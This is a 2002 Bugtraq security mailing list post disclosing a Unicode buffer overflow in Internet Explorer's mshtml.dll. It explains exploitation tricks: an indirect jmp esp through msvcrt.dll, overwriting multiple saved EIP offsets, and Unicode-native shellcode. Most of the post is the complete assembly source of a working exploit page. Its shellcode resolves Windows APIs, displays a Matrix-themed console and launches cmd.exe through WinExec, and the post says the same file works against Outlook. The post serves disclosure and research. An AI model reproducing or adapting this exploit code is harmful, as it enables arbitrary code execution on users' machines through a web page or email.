Home page logo

bugtraq logo Bugtraq mailing list archives

Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general)
Date: Wed, 27 Feb 2002 16:15:32 +0300


Advisory  was  originally  posted  in [1-3] 2 weeks ago, so I think it's
enough  time  passed  to publish some details, because [4,5] have enough
information to re-discover vulnerability.

ERRor  <error(at)pochtamt.ru>  discovered  IE  5.5 and 6.0 in some cases
crash on

 <embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.

Overflow    occurs    then    IE    concatenates   file   extension   to
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
with  wcscat().

There  is another input validation bug in Internet Explorer: it fails to
detect  if  file  has no extension. In this case it looks for dot before
filename  and  treats everything after that dot like an extension... So,
it's possible to overflow buffer with long filename without extension.

The rest of this paper is for vuln-dev :)

It's  a  kind  of  Unicode buffer overflow so much discussed on Vuln-Dev
some  time  ago.  Usually  we  do  not code and release any exploits for
"standard"  holes  like  format  strings  or  overflows  and  only point
vulnerability  is  exploitable. The only reason of this paper is to show
how  easy  is exploitation of this sort of bug. In future we do not plan
to release any exploits of this kind.

There are few problems for one who wants to create exploit:

1.  All  data  is converted to Unicode, that is 'A' will be converted to
2.  Address  of  shellcode will be different depending on number of open
Internet  Explorer  windows,  Windows  and Internet Explorer version and
patches installed.
3.  There is different offset of saved EIP in stack in Internet Explorer
before and after IE5.5SP2.
4.  A couple of small problems we will not describe, because it may help
to stop virus or scriptkiddie with exploit if one appear in-the-wild.

Now  you  can  try  to  exploit this bug by yourself... I've got working
exploit after half of hour without using any debugger/disassembler :)

One  of  the first Unicode overflows found in-the-wild was vulnerability
in IIS ISAPI filter found by eEye[6]. They failed to make really working
exploit,  saying  exploiting  of  this kind of bug is hard. This bug was
successfully  exploited  by hsj and later by authors of CodeRed worm. It
is  easy way to bypass conversion of the shellcode to Unicode: it should
be  in  Unicode  already.  It  was  a  trick  used by CodeRed (wonderful
analysis  of  CodeRed was made by Andrey Kolishak in [7]). I wrote about
Unicode  HTMLs  in  [8]  (in  fact  [8] was released to prevent possible
impacts  of  this  paper  but didn't succeeded, because multiple filters
still don't check Unicode htmls).

Andrey  pointed  to  easy (and well known) way to avoid second problem -
hardcoded  shellcode  address.  Instead  of  overwriting  saved EIP with
address  of  our shellcode we can use indirect jump - overwrite eip with
address  of instruction in memory space of some dll which will jump back
to  our  code  via  ebp  or  esp  (ebp  may be used if exploiting format
strings).  We fond jmp esp (FFE4) in all versions of kernel32.dll and in
one  version  of  msvcrt.dll  (6.10.8924.0). This version of dll doesn't
depend on Internet Explorer and presents in most installation of Windows
NT  4.0  and Windows 2000 we checked (but never in Windows 95/98/ME/XP),
so we used it.

Third  problem  was  solved  by overwriting all possible EIPs, using few
noops and

  call xxxx
  pop ebp

combination to get the exact address of our shellcode.

Since  exploit  is  in  Unicode  we  may do not care about '\0' (0x0000,
0xFFFF are prohibited and we have to care about calls and far jumps) so,
we  did  large  shellcode  with  visual  effects. If you like it you can
download  full  version  of  dH  & SECURITY.NNOV Matrix screensaver from

Resulting HTML (will work with msvcrt.dll 6.10.8924.0 and doesn't depend
on mshtml.dll version, program used and Windows version) can be obtained
from    http://www.security.nnov.ru/files/iebo/matrix.htm    Same   file
(properly  encoded  to  UTF-7, UTF-8, quoted-printable or base64) may be
used  to  exploit Outlook Express/Outlook. (I've just noticed that under
Windows  2000  terminal  window  sometimes is open in background and you
need  to  switch... Well... It's not good but I don't bother to patch it
:) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
;   matrix.asm - source code for matrix.htm
;   build:
;   tasm matrix.asm /m2
;   tlink matrix.obj, matrix.htm /t /3
;   Authors:
;     ERROR:    bug discovery
;     3APA3A:   idea and coding
;     OFFliner: matrix effects and undocumented Windows API
;   Thanx to Andrey Kolishak for indirect esp jump idea
;     you can obtain matrix screensaver from
;     http://www.security.nnov.ru/matrix
;  eipjmp: overwrites saved EIP for all versions of
;          mshtml.dll
;  espjmp: gets control after jmp esp and calls code1
;  code1:  restores EIP from stack after call to ebp
;          does some actions and jumps to code2
;  code2:  does the rest of actions

datap           equ (DataTable+080h)
hKernel32       equ LoadL-datap
cCur            equ StringTable-datap
SetCCH          equ StringTable+4-datap
GetSH           equ StringTable+8-datap
Sleep           equ StringTable+12-datap
WriteC          equ StringTable+16-datap
AllocC          equ StringTable+20-datap
SetCDM          equ StringTable+24-datap
SetCTA          equ StringTable+28-datap
SetCCI          equ StringTable+32-datap
WinE            equ StringTable+36-datap
ExitP           equ StringTable+40-datap

hStdOut         equ StringTable+48-datap
dwOldMode       equ cCur
conCur          equ StringTable+52-datap
cls             equ StringTable+56-datap
DWNumChar       equ StringTable+60-datap
RegHK           equ user-datap

_faked  segment para public 'CODE' use32
       assume cs:_faked
_faked   ends

_main  segment para public 'DATA' use32
       assume cs:_main

        begin   db      0ffh,0feh               ;Unicode prefix
                db      "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                db      "s",0,"r",0,"c",0,"=",0,34,0
                db      "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                db      "w",0,"w",0,"w",0,".",0
                db      "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                db      "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                db      "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                db      "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                db      "!(c)3APA3A"
                db      22 dup(090h)
        pop ebp
        mov esp,ebx
        xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
        mov ax,ebpdiff
        add ebp,eax                     ;ebp points to data
        lea eax,[ebp+user-datap]
        push eax
        mov ebx,[ebp+LoadL-datap]
        mov eax,[ebx]
        mov [ebp+LoadL-datap],eax
        call eax                        ;LoadLibraryA("user32.dll")
        lea ebx,[ebp+reg-datap]
        push ebx
        push eax
        mov ebx,[ebp+GetPA-datap]
        mov eax,[ebx]
        mov [ebp+GetPA-datap],eax
        call eax                        ;GetProcAddress(.,"RegisterHotKey")
        mov [ebp+RegHK],eax
        lea edi,[ebp+rhk-datap]
        movzx esi,byte ptr[edi]
        inc edi
        xor eax,eax
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        xor eax,eax
        push eax
        call [ebp+RegHK]
        dec esi
        or esi,esi
        jnz LoopHotKey
        lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
        push eax
        call [ebp+LoadL-datap]          ;LoadLibraryA("kernel32.dll")
        mov [ebp+hKernel32],eax         ;hKernel32 = 

        lea eax, [ebp+SetCCH]
        mov [ebp+cCur],eax              ;*cCur = SetCCH
        lea edi,[ebp+funcnum-datap]
        movzx esi,byte ptr[edi]         ;esi=funcnum
        inc edi
        push edi
        push dword ptr [ebp+Hkernel32]
        call [ebp+GetPA-datap]          ;GetProcAddress(edi)
        mov ebx,[ebp+cCur]
        mov [ebx],eax                   ;save func address
        xor ecx,ecx
        mov cl,4
        add ebx,ecx
        mov [ebp+cCur],ebx              ;cCur+=4
        not ecx
        xor eax,eax
        repnz scasb                     ;find \0
        dec esi
        or esi,esi
        jnz LoopResolve

        call [ebp+AllocC]               ;AllocConsole()
        push eax                        ;nonzero if succeed
        xor eax,eax
        push eax
        call [ebp+SetCCH]               ;SetConsoleCtrlHandler(NULL,TRUE)
        xor eax,eax
        not eax
        sub al,0Ah
        push eax
        call [ebp+GetSH]                ;GetStdHandle(STD_OUTPUT_HANDLE)
        mov [ebp+hStdOut],eax           ;hStdOut=
        lea eax,[ebp+dwOldMode]
        push eax
        xor ebx,ebx
        inc ebx
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCDM]               ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
        xor ebx,ebx
        mov bl,0Ah
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCTA]               ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN) 
        xor ebx,ebx
        mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = 100
        mov bl, 100
        mov [ebp+ConCur],ebx            ;ConCur.dwSize = 0
        lea eax, [ebp+ConCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCCI]               ;SetConsoleCursorInfo(hstdOut,&ConCur)
        xor eax,eax
        mov ax,1000
        push eax
        call[ebp+Sleep]                 ;Sleep(1000);
        xor ebx,ebx
        mov bl, string-datap
        mov eax,ebp
        add eax,ebx
        mov [ebp+cCur],eax              ;cCur = string
        mov eax,ebp
        mov bx,datap-empty_string
        sub eax,ebx
        mov [ebp+cls],eax               ;set address of empty_string
LOOP1:                                  ;do do
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        inc eax
        push eax
        mov eax,[ebp+cCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]               ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
        xor eax,eax
        mov al,100
        mov ecx,[ebp+cCur]
        mov bl,[ecx]
        sub bl,20
        jnz N1
        mov ax,400
N1:     mov bl,[ecx]
        sub bl,8
        jnz N2
        mov ax,2100
N2:     push eax
        call [ebp+Sleep]                ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx              ;++cCur
        mov bl,[ecx]
        sub bl,9
        jnz LOOP1                       ;while(*cCur!='\t');
        call [ebp+cls]
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx              ;++cCur
        mov bl,[ecx]
        sub bl,00Ah
        jnz LOOP1                       ;while(*cCur!='\n');
        inc ecx
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,18
        push eax
        push ecx
        push dword ptr [ebp+hStdOut]
        jmp code2

codelength  = $ - begin
neednoops = 1d4h - codelength
                db neednoops dup(090h)

                dd      78024e02h
                dd      78024e02h
                dd      78024e02h
                dd      78024e02h
                dw      9090h
                dd      78024e02h       ;EIP for IE < 55SP2


                db 18 dup(090h)
        xor eax,eax                     ;ESP comes here
        mov ax,0170h
        mov ebx,esp
        sub ebx,eax
        call ebx

        call [ebp+WriteC]
        xor eax,eax
        mov ax,4000
        push eax
        call [ebp+Sleep]
        call [ebp+cls]
        lea eax,[ebp+cmdexe-datap]
        push eax
        push eax
        call [ebp+WinE]
        xor eax,eax
        push eax
        call [ebp+ExitP]
        ; some code can be pasted here
        xor eax,eax
        mov ax,1000
        push eax
        call [ebp+Sleep]        ;Sleep(1000)
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,30
        push eax
        lea eax,[ebp+empty-datap]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]



        LoadL   dd      780330d0h       ;LoadLibraryA import table entry
        GetPA   dd      780330cch       ;GetProcAddress import table entry


                db      "kernel32.dll",0
        funcnum db      10
                db      "SetConsoleCtrlHandler",0
                db      "GetStdHandle",0
                db      "Sleep",0
                db      "WriteConsoleA",0
                db      "AllocConsole",0
                db      "SetConsoleDisplayMode",0
                db      "SetConsoleTextAttribute",0
                db      "SetConsoleCursorInfo",0
                db      "WinExec",0
                db      "ExitProcess",0
        user    db      "user32.dll",0
        reg     db      "RegisterHotKey",0
        cmdexe  db      "cmd.exe",0
        rhk     db      5
                db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
        empty   db      00dh,28 dup(020h),00dh,0
        string  db      00dh," Wake Up, Neo...",00dh,009h,0
                db      00dh," The Matrix has you...",00dh,009h,0
                db      00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                db      00dh," Knock, knock...",00dh,0
        padding db      32
                db      34,0,">",0,00ah
        copy    db      "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main   ends
   end  start
-=-=-=-=-=-=-=-=-  end matrix.asm  -=-=-=-=-=-=-=-=-


[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
[2] Microsoft Security Bulletin MS02-005
[3] CAN-2002-0022
[4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
    Internet Explorer
[5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
[6] All versions of Microsoft Internet Information Services Remote
    buffer overflow (SYSTEM Level Access)
[7] Andrey Kolishak, History of one vulnerability (in Russian)
[8] Bypassing content filtering software

        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
You know my name - look up my number (The Beatles)

  By Date           By Thread  

Current thread:
  • Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general) 3APA3A (Feb 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]